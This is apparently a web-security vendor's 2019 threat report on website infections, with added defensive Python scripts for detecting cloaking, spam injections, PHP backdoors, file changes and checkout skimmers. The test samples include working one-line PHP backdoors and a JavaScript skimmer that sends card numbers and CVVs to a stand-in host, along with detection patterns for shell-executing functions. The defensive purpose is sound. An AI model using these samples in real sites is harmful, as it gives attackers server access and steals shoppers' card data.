Our investigations and analysis are a key component in the development of our cleanup rules and signatures. These pieces of code provide our tools with the information required to identify and mitigate a variety of known threats, including SEO spam, hidden backdoors, hacktools, and other malware.
In an ongoing effort to combat malware, our research team is constantly refining the signatures used for cleanup and detection. This year's updates to our signature databases and automation scripts improved detection rates and reduced false positives, which gives us a more granular view of malware categories and signatures and shifts the detection figures compared with 2018.
Top Detected Malware
To identify the most common threats facing our clients in 2019, our team aggregated and analyzed data from malware signatures that were detected and cleaned during our Incident Response process.
Why is there an overlap in percentages?
Our research and remediation teams regularly find more than one type of malware on a compromised website. For example, attackers often plant backdoors on a website after it has been compromised to maintain access to the environment.
SEO Spam
SEO spam is one of the fastest growing families over the past few years — and consistently one of the most common infections found on client sites.
During 2019, 62% of client sites contained SEO spam. Infections typically occur via PHP, database injections, or .htaccess redirects.
Websites impacted by SEO spam attacks often become infected with spam content and redirects that send site visitors to spam landing pages. These attacks can significantly impact rankings and organic traffic, since popular search engines like Google, Bing, and Yahoo block websites that serve malicious content.
Left untreated, SEO spam can seriously damage a website's reputation and harm its visitors, and leads to lost revenue, hijacked search results, browser warnings, and ultimately blocklisting.
The majority of infected websites contained more than one type of spam injection. On average we found 12 different types of injected spam on a single website, indicating that attackers use a variety of methods to monetize compromised websites and rank for specific keywords.
The most common SEO spam malware was found in the database, where it injects unwanted content into existing posts and pages. In 2019, 39% of all sites we cleaned for SEO spam infections had their database compromised.
One technique hackers commonly employed was cloaking, which causes search engines and site visitors to see different content on compromised pages. With this technique, the content of entire websites is replaced with spam and indexed by search engine crawlers. However, when a real visitor arrives organically from a search engine, they are redirected to a landing page on a third-party website. Webmasters typically see the website as they created it, without any changes or spam content whatsoever.
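Because cloaking keys on who is asking, the practical check is to request the same URL three ways (as a search-engine crawler, as a visitor arriving from a search engine, and directly) and compare what comes back. The script below is an added example written for this report, not Sucuri's tooling: the hostnames are placeholders, the two "site" functions are constructed stand-ins that reproduce the behaviour described above, and the Googlebot user-agent string is Google's public one. The `urllib_fetch` helper is included for running the same check against a live site.

```python
"""Cloaking check: request one URL as a search-engine crawler, as an organic visitor
arriving from a search engine, and as a direct visitor, then compare the three views.
A cloaked page serves spam to the crawler and redirects organic visitors off-site,
while the direct (webmaster) view still looks clean."""
import hashlib
import re
import urllib.error
import urllib.request
from urllib.parse import urlparse

# Request profiles (assumed): the crawler UA is Googlebot's public string, the browser UA is generic.
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/70.0"
PROFILES = {
    "crawler": {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"},
    "organic": {"User-Agent": BROWSER_UA, "Referer": "https://www.google.com/"},
    "direct": {"User-Agent": BROWSER_UA},
}


def text_fingerprint(body):
    """Hash only the visible text, so per-request nonces or timestamps in markup do not cause false alarms."""
    text = re.sub(r"<(script|style)\b.*?</\1>", " ", body, flags=re.S | re.I)
    text = re.sub(r"<[^>]+>", " ", text)
    text = re.sub(r"\s+", " ", text).strip().lower()
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def check_cloaking(fetch, url):
    """fetch(url, headers) -> (status, response_headers, body). Returns a list of (code, detail) findings."""
    site_host = urlparse(url).hostname
    views = {name: fetch(url, dict(hdrs)) for name, hdrs in PROFILES.items()}
    findings = []
    # 1. Organic visitors bounced to a third-party host: the classic cloaked-redirect symptom.
    status, headers, _ = views["organic"]
    if 300 <= status < 400:
        target = urlparse(headers.get("Location", ""))
        if target.hostname and target.hostname != site_host:
            findings.append(("offsite_redirect", target.hostname))
    # 2. Crawler text differing from the direct view means the spam is hidden from the webmaster.
    c_status, _, c_body = views["crawler"]
    d_status, _, d_body = views["direct"]
    if c_status == 200 and d_status == 200 and text_fingerprint(c_body) != text_fingerprint(d_body):
        findings.append(("crawler_mismatch", "crawler and direct views differ"))
    return findings


def urllib_fetch(url, headers):
    """Live fetcher for check_cloaking. Redirects are NOT followed, so the 3xx itself is observed."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, hdrs, newurl):
            return None  # surface the 3xx as HTTPError instead of following it
    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(url, headers=headers)
    try:
        with opener.open(req, timeout=15) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, dict(e.headers), e.read().decode("utf-8", "replace")


def fake_cloaked_site(url, headers):
    """Constructed stand-in for a compromised site (not real traffic), behaving as described in the text."""
    if "googlebot" in headers.get("User-Agent", "").lower():
        return 200, {}, "<html><body><h1>Cheap viagra online</h1><p>No prescription pharmacy.</p></body></html>"
    if "google.com" in headers.get("Referer", ""):
        return 302, {"Location": "http://spam-landing.example/pharma"}, ""
    return 200, {}, "<html><body><h1>Welcome to our bakery</h1><p>Fresh bread daily.</p></body></html>"


def fake_clean_site(url, headers):
    """Constructed clean site: the same page for every profile."""
    return 200, {}, "<html><body><h1>Welcome to our bakery</h1><p>Fresh bread daily.</p></body></html>"


if __name__ == "__main__":
    for code, detail in check_cloaking(fake_cloaked_site, "https://shop.example/"):
        print(code, detail)
    # Against a live site: check_cloaking(urllib_fetch, "https://your-site.example/")
```

Run it from a machine the attacker does not expect (not the webmaster's usual IP), since some cloaking also keys on the visitor's address; and keep the direct view in the comparison, because that is the view the webmaster has already been looking at without noticing anything.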
Another common technique was injecting blocks of links made invisible with CSS tricks or JavaScript. These links are placed on legitimate pages to help search engines find and index spam sites, increasing the number of backlinks and boosting the rankings of the spammy websites.
Common Spam Content
We analyzed SEO spam keywords from SiteCheck to identify the most prevalent themes and keywords on hacked websites.
Top Spam Themes
- Viagra
- Cialis
- Sport jerseys
- Pharmacies/no prescriptions
- Replica watches
- Porn
- Turkish escort spam
- Essay spam
Unsurprisingly, 59% of spam content was related to pharmaceuticals and male enhancement keywords, with viagra (31%) and cialis (17%) being the most common keywords in this category.
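The database injections and hidden link blocks described above, together with the spam themes listed here, can be turned into a direct scan of the posts table. The following is an added example written for this report, not Sucuri's signature set or cleanup scripts: the theme keywords are a small subset drawn from the list above, the hidden-block patterns are common CSS tricks, and the wp_posts rows are constructed sample data loaded into an in-memory SQLite table so the scan runs offline.

```python
"""Scan wp_posts content for injected SEO spam: spam-theme keywords and link blocks hidden
from visitors. Runs here against an in-memory SQLite copy of the table; the same query
works against the MySQL wp_posts table of a live WordPress site."""
import re
import sqlite3

# Keyword themes from the list above (subset). Word boundaries keep 'cialis' from matching inside 'specialist'.
THEMES = {
    "pharma": r"\b(viagra|cialis|no prescription|online pharmacy)\b",
    "replica": r"\b(replica watches?|cheap (?:nfl|nhl) jerseys?)\b",
    "essay": r"\b(essay writing service|buy essays?)\b",
}
# Link blocks hidden with CSS (display:none, visibility:hidden) or pushed far off-screen.
# Assumes double-quoted style attributes, which is how WordPress serializes them.
HIDDEN_BLOCK = re.compile(
    r'<(div|span|p)\b[^>]*style="[^"]*(display\s*:\s*none|visibility\s*:\s*hidden|'
    r'(?:left|top)\s*:\s*-\d{3,}px)[^"]*"[^>]*>(.*?)</\1>', re.S | re.I)
LINK = re.compile(r"""<a\b[^>]*href=["']([^"']+)""", re.I)


def scan_post(content):
    """Return a list of (kind, name, count) findings for one post body."""
    findings = []
    for theme, pattern in THEMES.items():
        hits = re.findall(pattern, content, flags=re.I)
        if hits:
            findings.append(("keyword", theme, len(hits)))
    for m in HIDDEN_BLOCK.finditer(content):
        links = LINK.findall(m.group(3))
        if links:
            findings.append(("hidden_links", m.group(1), len(links)))
    return findings


def scan_wp_posts(conn, table="wp_posts"):
    """Scan every row: drafts and revisions are not indexed, but injected content there still needs cleaning."""
    report = {}
    for post_id, content in conn.execute(f"SELECT ID, post_content FROM {table}"):
        findings = scan_post(content or "")
        if findings:
            report[post_id] = findings
    return report


def theme_counts(report):
    """Number of posts per spam theme, the kind of breakdown shown in the list above."""
    counts = {}
    for findings in report.values():
        for kind, name, _ in findings:
            if kind == "keyword":
                counts[name] = counts.get(name, 0) + 1
    return counts


def build_sample_db():
    """Constructed sample wp_posts table (not real client data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT, post_status TEXT)")
    conn.executemany("INSERT INTO wp_posts VALUES (?,?,?,?)", [
        (1, "Our bakery", '<p>We bake fresh bread daily and our specialist decorates cakes.</p>', "publish"),
        (2, "Opening hours", '<p>Open 8-6.</p><div style="display:none"><a href="http://pills.example/">cheap viagra</a> '
                             '<a href="http://pills.example/c">cialis online</a></div>', "publish"),
        (3, "Jerseys", '<p>Cheap NFL jerseys here</p><div style="position:absolute;left:-9999px">'
                       '<a href="http://jerseys.example/">nfl</a></div>', "publish"),
        (4, "Draft", '<p>cheap viagra</p>', "draft"),
    ])
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    result = scan_wp_posts(db)
    for post_id, findings in result.items():
        print(post_id, findings)
    print(theme_counts(result))
```

Post 1 is the false-positive control: "specialist" contains "cialis" and must not be flagged. When cleaning a real site, extend THEMES from your own SiteCheck-style keyword data and diff post_content against a known-good backup rather than deleting matches blindly, since the injected block usually sits inside an otherwise legitimate post.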
Replica merchandise spam was another common theme, accounting for 34% of spam detections. In fact, 27% of all detections promoted fake sport team jerseys for popular leagues like the NFL and NHL.
These themes have stayed more or less the same for the past 10 years, with relatively few changes.
Backdoors
Backdoors are one of the most common threats found on compromised websites. In 2019, 47% of infected sites contained at least one backdoor.
When injected into a website, this malware bypasses the regular access channels to give attackers privileged access to the environment. Once installed, bad actors use these backdoors to maintain access long after the initial infection has taken place.
At the file level, backdoors are prone to removal during core, theme, and plugin updates, and it is typically easier to find and remove common backdoors than other malware categories such as database spam, which may be injected into otherwise legitimate wp_posts entries.
Uploaders
The most common type of backdoor found in 2019 fell under the uploaders category. As the name implies, this malicious code allows anyone with the correct path, parameters, and (sometimes) credentials to upload malicious files to the website filesystem. These can be leveraged to drop spam, webshells, or hacktools to the site.
Remote Code Execution Backdoors
One of the simplest varieties is the remote code execution backdoor, not to be confused with the exploitation of remote code execution vulnerabilities in legitimate software.
This malware executes code supplied by the attacker, most commonly through POST or GET parameters or cookie values. Its simplicity and effectiveness make it extremely common on reinfections, and it ranks among the top three backdoors in our logs.
Like an uploader, it can only be reached by someone who knows the correct path and parameters (and sometimes credentials), and it lets bad actors run code or write files without the webmaster's consent.
Webshells
Webshells are dashboards that provide an interface for the attacker to the website filesystem. These webshells allow bad actors to perform common functions, including renaming, copying, editing files, changing file permissions, and archiving files.
Some webshells also offer further attack capabilities, such as running arbitrary PHP code, connecting to database servers, and launching other attacks against the server to escalate privileges.
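The three families just described (uploaders, remote code execution backdoors fed from GET/POST/COOKIE data, and webshells) each leave a recognisable footprint in PHP source, which is what a cleanup signature keys on. The triage script below is an added example written for this report, not Sucuri's signature database: the patterns are our own regular expressions for the behaviours described above, and the PHP samples, including the legitimate upload handler used as a false-positive control, are constructed for the demonstration.

```python
"""Static triage of PHP files for the backdoor families described above: uploaders,
remote-code-execution (RCE) backdoors fed from GET/POST/COOKIE data, and webshells.
Regex-based, so it is a triage aid rather than proof: review every hit by hand."""
import re

# Request data under the attacker's control.
REQ = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["
DECODERS = r"(?:(?:base64_decode|gzinflate|gzuncompress|str_rot13|stripslashes|urldecode)\s*\(\s*)*"

RCE_PATTERNS = [
    # eval(base64_decode($_POST['x'])) and friends, with any stack of decoders in between
    re.compile(r"\b(?:eval|assert|create_function)\s*\(\s*" + DECODERS + REQ, re.I),
    # $f = $_COOKIE['fn']; ... $f($_COOKIE['arg']);  (function named by the request, then called)
    re.compile(r"\$(\w+)\s*=\s*" + REQ + r"[^;]*;.*?\$\1\s*\(", re.I | re.S),
    # shell commands built from request data
    re.compile(r"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\([^;]*?" + REQ, re.I),
    # legacy PHP 5 preg_replace with the /e modifier evaluates the replacement as code
    re.compile(r"""preg_replace\s*\(\s*(['"])[^'"]*/[a-zA-Z]*e[a-zA-Z]*\1""", re.I),
]
# A file write whose destination or content comes straight from the request (an uploader).
# A legitimate upload handler writes to a fixed directory, so it does not match.
UPLOADER = re.compile(r"\b(?:move_uploaded_file|file_put_contents|fopen|copy)\s*\([^;]*?" + REQ, re.I)
# Webshells bundle many filesystem/database operations behind request-driven dispatch.
WEBSHELL_FUNCS = ("opendir", "scandir", "unlink", "rename", "chmod", "copy", "fwrite",
                  "mysqli_connect", "mysql_connect", "posix_getpwuid", "symlink")


def classify(php_source):
    """Return the set of backdoor categories a PHP source matches (empty set = no hit)."""
    cats = set()
    if any(p.search(php_source) for p in RCE_PATTERNS):
        cats.add("rce")
    if UPLOADER.search(php_source):
        cats.add("uploader")
    used = {f for f in WEBSHELL_FUNCS if re.search(r"\b" + f + r"\s*\(", php_source)}
    if len(used) >= 4 and re.search(REQ, php_source):
        cats.add("webshell")
    return cats


def triage(files):
    """files: {name: source}. Returns {name: sorted categories} for files with at least one hit."""
    report = {}
    for name, src in files.items():
        cats = classify(src)
        if cats:
            report[name] = sorted(cats)
    return report


# Constructed samples modelled on the families described in the text (not real client files).
SAMPLES = {
    "rce_post.php": "<?php @eval(base64_decode($_POST['z0'])); ?>",
    "rce_cookie.php": "<?php $f = $_COOKIE['fn']; $f($_COOKIE['arg']);",
    "uploader.php": "<?php if (isset($_FILES['f'])) { move_uploaded_file($_FILES['f']['tmp_name'], $_POST['dst']); } ?>",
    "shell.php": "<?php $d=$_GET['d']; foreach(scandir($d) as $e){ echo $e; } "
                 "if($_GET['a']=='rm'){unlink($_GET['p']);} if($_GET['a']=='mv'){rename($_GET['p'],$_GET['n']);} "
                 "chmod($_GET['p'],0777); ?>",
    # Legitimate handler: fixed directory, extension check. Must not be flagged.
    "legit_upload.php": "<?php $name = basename($_FILES['f']['name']);\n"
                        "if (preg_match('/\\.(png|jpg)$/i', $name)) { "
                        "move_uploaded_file($_FILES['f']['tmp_name'], '/var/www/uploads/' . $name); }",
}

if __name__ == "__main__":
    for name, cats in triage(SAMPLES).items():
        print(name, cats)
```

Real backdoors layer obfuscation (string concatenation, chr() sequences, variable variables) on top of these primitives precisely to defeat pattern matching, which is why file integrity monitoring and a known-good baseline catch what signatures miss.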
Backdoor Mitigation Tips:
- Employ file integrity monitoring tools to identify indicators of compromise.
- Create and maintain strong, unique passwords on all accounts.
- Use a firewall to filter malicious activity and block access to backdoors.
- Keep all software patched with the latest security updates to mitigate risk.
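The first tip, file integrity monitoring, comes down to a hashed baseline of the web root and a periodic diff against it. The script below is an added example written for this report, not Sucuri's monitoring product: the ignored directories are an assumption to tune per site, and the demo scenario (a clean site, then a dropped backdoor plus code appended to index.php) is constructed in a temporary directory so it runs offline.

```python
"""Minimal file integrity monitor: record a baseline of SHA-256 hashes for a web root,
then report files that were added, removed or modified. A backdoor dropped after a
compromise and a legitimate file with code appended both surface as changes."""
import hashlib
import json
import os
import tempfile

IGNORE_DIRS = {".git", "node_modules", "cache"}  # assumed noisy directories; tune per site


def hash_tree(root):
    """Map relative path (always with forward slashes) -> sha256 for every regular file under root."""
    hashes = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in IGNORE_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as f:
                for chunk in iter(lambda: f.read(1 << 16), b""):
                    h.update(chunk)
            hashes[os.path.relpath(path, root).replace(os.sep, "/")] = h.hexdigest()
    return hashes


def save_baseline(baseline, path):
    """Store the baseline outside the web root, ideally off-host: an attacker who can write
    to the site could otherwise simply refresh the baseline to cover the backdoor."""
    with open(path, "w") as f:
        json.dump(baseline, f, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def compare(baseline, current):
    """Diff two hash maps into added / removed / modified relative paths."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p]),
    }


def demo():
    """Constructed scenario: clean site, then a dropped backdoor and a payload appended to index.php."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content", "uploads"))
        with open(os.path.join(root, "index.php"), "w") as f:
            f.write("<?php require 'wp-blog-header.php';")
        with open(os.path.join(root, "wp-content", "uploads", "photo.jpg"), "wb") as f:
            f.write(b"\xff\xd8\xff")
        before = hash_tree(root)
        # simulated compromise: hidden PHP dropped into uploads, loader appended to a core file
        with open(os.path.join(root, "wp-content", "uploads", ".cache.php"), "w") as f:
            f.write("<?php eval($_POST['c']);")
        with open(os.path.join(root, "index.php"), "a") as f:
            f.write("\n<?php @include 'wp-content/uploads/.cache.php';")
        return compare(before, hash_tree(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Re-baseline only after a deliberate update, and treat any PHP file appearing under an uploads directory as a finding regardless of what else changed: that location should never hold executable code.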
In many instances, attackers scan target hosts for known backdoors, hoping to abuse another attacker's backdoor. Backdoors are particularly effective at eluding modern website scanning technologies, which makes them one of the most commonly missed payloads and a leading cause of reinfections.
Hacktools
The hacktool category is used by our researchers to identify tools planted by bad actors on web servers for their own use. These tools normally don’t affect the site itself — instead, they take advantage of server resources for malicious activity.
In 2019, nearly 3% of websites were found to contain a hacktool.
Some examples of hacktools may include tools used for mass defacement of a website, spam mailers, botnet scripts, scripts used to fingerprint vulnerable sites on a shared server environment, or tools used for DDoS attacks.
There were a total of 135 new hacktools added to our signature database this year alone, indicating that attackers are constantly innovating and creating new tools to help them hack websites.
Commonly found hacktools include configuration stealers, which read CMS configuration files to harvest credentials, the addresses of database servers in shared hosting environments, and other sensitive configuration data.
Phishing
Phishing campaigns in 2019 typically masqueraded as popular services including webmail, login pages for reputable brands, online banking portals, or landing pages for popular social networks.
Attackers employed targeted email campaigns with messaging containing fear, uncertainty, doubt, or personalized elements to encourage users to navigate to deceptive phishing landing pages.
These landing pages are usually composed of several HTML pages that mimic a login workflow to collect sensitive user information. They also include a PHP script that either emails data to attackers, or stores it somewhere on the site so that it can be obtained at a later date.
The biggest phishing campaigns that our client base saw in 2019 were related to Netflix, followed by PayPal. Our researchers created hundreds of new signatures to detect phishing for popular brands like Microsoft, Apple, and Bank of America.
We also saw a large number of phishing-related signatures created for popular hosting providers and domain name registrars. When successful, these specific campaigns allow attackers to obtain login credentials to websites and server environments.
Mailers
Mailer scripts send email from compromised sites without the webmaster's consent. These spam campaigns abuse web server resources, sending out large volumes of mail until the server is flagged for sending spam and blocklisted by email service providers and anti-spam authorities.
This type of malware is a problem for both webmasters and hosting providers, as it can cause all mail sent from the affected IPs to land in spam folders, or to be rejected entirely.
In 2019, nearly every phishing campaign saw a mailer script associated with it.
Defacements
Hackers are sometimes motivated by political or religious reasons, or simply vandalize a website for the sake of it. This vandalism triggers our tools' defacement rules, which accounted for 5.76% of all client-side detections in 2019.
Our top 10 defacement signatures in 2019 were related to generic detections, meaning that our heuristic signatures detected a defacement without associating the attack to a specific hacker group.
Ecommerce Malware & Credit Card Stealers
In previous years, we saw massive attacks that used the same injections on large numbers of websites. One distinct difference in 2019 was a marked change in the behaviour of credit card stealing attacks.
Our researchers found that credit card stealing malware is becoming more granular: hackers are no longer aiming to infect large numbers of websites. Instead, they create targeted, highly customized infections for popular websites with high traffic volume and a large user base. The most notable example in 2019 was Magecart, which saw a large number of attacks against ecommerce websites running a range of CMS applications, including Magento and WordPress.
Infections which once targeted large numbers of websites in 2018 are now being highly customized on an individual basis.
The same script from the same malicious domain may be used on just a handful of websites, sometimes fewer, and the same campaign may rotate through multiple malicious domains. Encrypted variants likewise reuse a given encryption scheme on only a small number of websites.
Our researchers also saw evasive techniques coded into skimmers that prevent certain behavior from being launched when certain conditions are met. For example, some skimmers won’t load if a visiting browser’s developer tools are open.
In 2019, our researchers added 178 new ecommerce malware signatures to SiteCheck, to our monitoring and detection tools, and to our cleanup scripts. Twenty-eight of these were associated with server-side skimmers that are not visible to external scans, highlighting the importance of monitoring for indicators of compromise both in content loaded in the visitor's browser (e.g. HTML, JavaScript) and at the server level (e.g. PHP).
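For the client-side half of that monitoring, the useful question on a checkout page is where the page sends data: which origins serve scripts, where forms post, and whether any inline script both reads card fields and exfiltrates them, possibly behind the developer-tools check mentioned above. The audit below is an added example written for this report, not Sucuri's SiteCheck logic: the allow-list, hostnames and sample checkout page are constructed, and the outerWidth/innerWidth comparison is one common way skimmers detect an open developer-tools pane, used here as an illustrative heuristic. Server-side (PHP) skimmers never appear in page output and need file-level monitoring instead.

```python
"""Inventory where a checkout page sends data: external script origins, form actions, and
inline scripts that read card fields and exfiltrate them. Compared against an allow-list
of expected origins, anything else is a skimmer lead for manual review."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# What a skimmer needs: read card fields ...
CARD_FIELDS = re.compile(r"card[_-]?number|cc[_-]?num|cvv|cvc|expir", re.I)
# ... and send them somewhere: XHR/fetch/beacon, or a tracking-pixel style Image request.
EXFIL = re.compile(r"\b(?:XMLHttpRequest|fetch\s*\(|navigator\.sendBeacon|new\s+Image\s*\(|\.src\s*=)", re.I)
# Evasion heuristics: a docked devtools pane widens outerWidth relative to innerWidth; 'debugger' stalls analysis.
DEVTOOLS_CHECK = re.compile(
    r"outerWidth\s*-\s*(?:window\.)?innerWidth|outerHeight\s*-\s*(?:window\.)?innerHeight|\bdebugger\b|devtools", re.I)


class CheckoutAudit(HTMLParser):
    """Collect script sources, form actions and inline script bodies from a page."""
    def __init__(self):
        super().__init__()
        self.script_srcs, self.form_actions, self.inline_scripts = [], [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.script_srcs.append(a["src"])
            else:
                self._in_script, self._buf = True, []
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline_scripts.append("".join(self._buf))
            self._in_script = False


def audit(html, page_url, allowed_origins):
    """Return (finding, detail) pairs: unexpected third-party origins and card-exfiltrating inline scripts."""
    host = urlparse(page_url).hostname
    p = CheckoutAudit()
    p.feed(html)
    findings = []
    for kind, urls in (("script", p.script_srcs), ("form", p.form_actions)):
        for u in urls:
            h = urlparse(u).hostname  # relative URLs have no hostname and stay first-party
            if h and h != host and h not in allowed_origins:
                findings.append((f"unexpected_{kind}_origin", h))
    for js in p.inline_scripts:
        if CARD_FIELDS.search(js) and EXFIL.search(js):
            evasion = "devtools_evasion" if DEVTOOLS_CHECK.search(js) else "no_evasion"
            findings.append(("inline_card_exfil", evasion))
    return findings


# Constructed checkout page: one legitimate payment script, one first-party script, one rogue
# "analytics" CDN that also receives the card data from the inline skimmer.
SAMPLE_CHECKOUT = """
<html><head>
<script src="https://js.stripe.example/v3/"></script>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="https://static-analytics-cdn.example/jquery.min.js"></script>
</head><body>
<form action="/checkout/submit" method="post">
  <input name="card_number"><input name="cvv"><input name="expiry">
</form>
<script>
(function(){
  if (window.outerWidth - window.innerWidth > 160) { return; }  // bail out if devtools look open
  document.querySelector('form').addEventListener('submit', function(){
    var d = btoa(document.querySelector('[name=card_number]').value + '|' + document.querySelector('[name=cvv]').value);
    new Image().src = 'https://static-analytics-cdn.example/p.gif?d=' + d;
  });
})();
</script>
<script>window.dataLayer = window.dataLayer || [];</script>
</body></html>
"""
ALLOWED = {"js.stripe.example", "cdn.shop.example"}  # assumed allow-list for this shop

if __name__ == "__main__":
    for finding in audit(SAMPLE_CHECKOUT, "https://shop.example/checkout", ALLOWED):
        print(finding)
```

Run it against the HTML as the browser receives it, not the theme template, since both the injected script tag and the inline payload are typically added in the database or at render time; and repeat it with devtools closed, because the evasive variants described above behave differently when they believe they are being watched.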
In 2019, over 5,000 websites remotely scanned with SiteCheck were found to contain credit card skimmers, impacting a large number of online shoppers. In addition, a total of 1,845 blocklisted skimmer resources were detected.
This year alone, our remediation team cleaned over 600 web servers infected with PHP credit card stealers, emphasizing the importance of server-side monitoring to detect indicators of compromise. Client-side credit card stealers were removed from databases and JavaScript files on over 1,700 websites.